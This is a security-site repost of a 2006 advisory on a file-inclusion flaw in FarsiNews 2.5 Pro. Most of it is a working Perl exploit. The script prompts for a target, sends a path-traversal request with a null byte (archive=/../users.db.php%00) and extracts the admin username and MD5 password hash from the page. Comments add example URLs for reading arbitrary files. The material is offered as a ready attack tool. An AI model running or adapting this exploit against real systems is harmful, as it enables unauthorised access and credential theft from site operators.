首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
FarsiNews Remote File Inclusion
来源:www.hessamx.net 作者:hessamx 发布时间:2006-03-23  

FarsiNews Remote File Inclusion

Summary
"FarsiNews is a News Publishing System"

Improper user input allows attackers to include arbitrary file .

Credit:
The information has been provided by hessamx.

Details
Vulnerable Systems:
* FarsiNews version 2.5 Pro and prior

Exploit:
#!/usr/bin/perl
# << HESSAM-X >>
# FarsiNews 2.5Pro Exploi
# Exploit by Hessam-x (www.hessamx.net)
#Iran Hackerz Security Team
#WebSite: www.hackerz.ir
#
# Summery
# Name : FarsiNews [www.farsinewsteam.com]
# version : 2.5Pro
######################################################
# in FarsiNews if you change the archive value :
# http://localhost/index.php?archive=hamid
# see :
# Warning: file([PATH]/data/archives/hamid.news.arch.php):
# failed to open stream: No such file or directory in [PATH]\inc\shows.inc.php on line 642
# Warning: file([PATH]/data/archives/hamid.comments.arch.php):
# failed to open stream: No such file or directory in [PATH]\inc\shows.inc.php on line 686
# ...[and many other error]
# it means that shows.inc.php try to open '/archives/hamid.news.arch.php' (and also 'hamid.comments.arch.php') to read it's data .
# we can change the archive value to '/../users.db.php%00' to see all username and password .
# Exploit :
# http://localhost/index.php?archive=/../users.db.php%00
# http://localhost/Farsi1/index.php?archive=/../[file-to-read]%00
# F0und by hamid
use LWP::Simple;

print "-------------------------------------------\n";
print "= Farsinews 2.5Pro =\n";
print "= By Hessam-x - www.hackerz.ir =\n";
print "-------------------------------------------\n\n";


print "Target(www.example.com)\> ";
chomp($targ = <STDIN>);

print "Path: (/fn25/)\>";
chomp($path=<STDIN>);

$url = "index.php?archive=/../users.db.php%00";
$page = get("http://".$targ.$path.$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $targ\n";

$page =~ m/<img alt="(.*?)" src=/ && print "[+] Username: $1\n";
$page =~ m/style="border: none;" align="right" \/>(.*?)<\/font>/ && print "[+] MD5 Password: $1\n";

print "[-] Unable to retrieve User ID\n" if(!$1);
#EoF



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Apple Mac OS X File Rewrites a
·IGMP v3 DoS (MS06-007, Exploit
·BomberClone Buffer Overflow Ex
·ASPPortal <= 3.1.1 Remote S
·X.Org X11 (X11R6.9.0/X11R7.0)
·The IIS Worker Process (w3wp)
·A vulnerability in HT 9.1 Expl
·VWar Remote Code Execution (Ex
·Mercur IMAPD Buffer Overflow (
·Internet Explorer 0day Unoffic
·MyBB version 1.04 and prior SQ
·Zdaemon and xdoom Multiple Vul
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved